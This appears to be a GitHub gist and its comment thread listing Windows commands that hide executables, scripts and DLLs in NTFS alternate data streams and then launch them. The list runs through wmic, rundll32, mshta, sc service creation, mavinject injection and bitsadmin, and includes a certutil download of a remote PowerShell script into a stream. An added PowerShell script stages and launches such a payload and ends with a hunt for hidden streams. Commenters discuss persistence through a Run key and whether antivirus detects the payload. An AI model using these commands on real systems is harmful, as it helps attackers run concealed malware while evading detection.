Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
#Executing the ADS content
* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
* Rundll32
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
* Cscript
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
* Wscript
wscript c:\ads\file.txt:script.vbs
* Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
* Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
notepad.exe 4172 31C5CE94259D4006 2 18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
* MSHTA
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
* Control.exe
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209
* Create service and run
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* Powershell.exe
powershell -ep bypass - < c:\temp:ttt
* Powershell.exe
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "C:\ads\folder:file.exe"}
* Regedit.exe
regedit c:\ads\file.txt:regfile.reg
* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile
* AppVLP.exe
AppVLP.exe c:\windows\tracing\test.txt:ha.exe
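The two halves of the list above (staging bytes into a stream, then launching them) are easiest to reason about as one end-to-end script. The following PowerShell is an added example and is not part of the original gist or its author's tooling. It stages a stand-in payload (a copy of notepad.exe) into a named stream of a harmless carrier file using byte-level I/O, proves the bytes landed intact by hashing the stream, launches it through the same Win32_Process.Create primitive as the WMIC and Invoke-CimMethod lines, and finishes with the enumeration a defender would run to find non-default streams. The directory under %TEMP%, the stream name `stage.exe`, and the use of notepad.exe as the payload are assumptions for the demo; it needs an NTFS volume and Windows PowerShell 5.1 or PowerShell 7.

```powershell
# Added example (not from the original gist). Stage a binary in an NTFS alternate
# data stream byte-for-byte, verify it, optionally launch it, then hunt for it.
# Assumed values: carrier under %TEMP%, stream name 'stage.exe', notepad.exe as payload.
param(
    [string]$HostFile   = (Join-Path $env:TEMP 'ads-demo\readme.txt'),
    [string]$StreamName = 'stage.exe',
    [string]$Payload    = (Join-Path $env:SystemRoot 'System32\notepad.exe'),
    [switch]$Launch
)

New-Item -ItemType Directory -Force -Path (Split-Path $HostFile) | Out-Null
Set-Content -Path $HostFile -Value 'nothing to see here'   # the visible carrier file

# 1. Stage. Get-Content/Set-Content are text cmdlets and will mangle a PE unless
#    told to work in bytes; the .NET file APIs accept the "file:stream" form
#    directly and copy the bytes untouched.
$adsPath = "${HostFile}:${StreamName}"
[System.IO.File]::WriteAllBytes($adsPath, [System.IO.File]::ReadAllBytes($Payload))

# 2. Verify. The Length shown by dir / Get-ChildItem covers only the unnamed
#    $DATA stream, so the carrier still looks tiny, yet the named stream hashes
#    identically to the source binary.
$srcHash = (Get-FileHash -Path $Payload -Algorithm SHA256).Hash
$fs = [System.IO.File]::OpenRead($adsPath)
try   { $adsHash = (Get-FileHash -InputStream $fs -Algorithm SHA256).Hash }
finally { $fs.Dispose() }
"carrier size on disk : {0} bytes" -f (Get-Item -Path $HostFile).Length
"payload hash matches : {0}"       -f ($srcHash -eq $adsHash)

# 3. Execute, using the same primitive as the WMIC / Invoke-CimMethod entries.
#    CommandLine must be a quoted string, and because the carrier path may
#    contain spaces the ADS path itself is wrapped in its own quotes.
if ($Launch) {
    $r = Invoke-CimMethod -ClassName Win32_Process -MethodName Create `
                          -Arguments @{ CommandLine = "`"$adsPath`"" }
    "Win32_Process.Create returned {0}, PID {1}" -f $r.ReturnValue, $r.ProcessId
}

# 4. Hunt. Enumerate every stream under the directory and discard the two
#    streams that are expected on a normal machine: ':$DATA' (the file's own
#    content) and 'Zone.Identifier' (Mark-of-the-Web on downloaded files).
Get-ChildItem -Path (Split-Path $HostFile) -Recurse -File |
    Get-Item -Stream * |
    Where-Object { $_.Stream -notin ':$DATA', 'Zone.Identifier' } |
    Select-Object FileName, Stream, Length
```

Save it as a .ps1 and run it without `-Launch` to see only the staging, hash check and the hunt output; add `-Launch` to actually start the staged copy of notepad.exe from the stream. The hunt in step 4 is the check worth keeping: pointing it at a directory tree and filtering out `:$DATA` and `Zone.Identifier` surfaces exactly the kind of carrier files the commands above create, and the returned Length exposes the hidden payload size that a normal directory listing omits.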
Thanks. Good to hear.
sparta34 commented Apr 13, 2018
Good job, but when the victim reboots, where is the persistence mechanism here? Can you make a small demo for this please, thanks a lot
Hi. These are not persistence mechanisms. These are only ways of hiding programs within ADS and ways of executing them. How to place your persistence is up to you. For instance, a RUN key in the registry could launch the WMIC command that executes data from an Alternate Data Stream.
webs3c commented Apr 27, 2018
"powershell Start-Process -FilePath xx.exe" can execute the file too~
jmaravi commented Jun 17, 2018
Will AV detect the malicious payload?
curi0usJack commented Jan 22, 2019
@jmaravi - yes.
D4Vinci commented Apr 12, 2018 (edited)
Great work man, this helps a lot 😄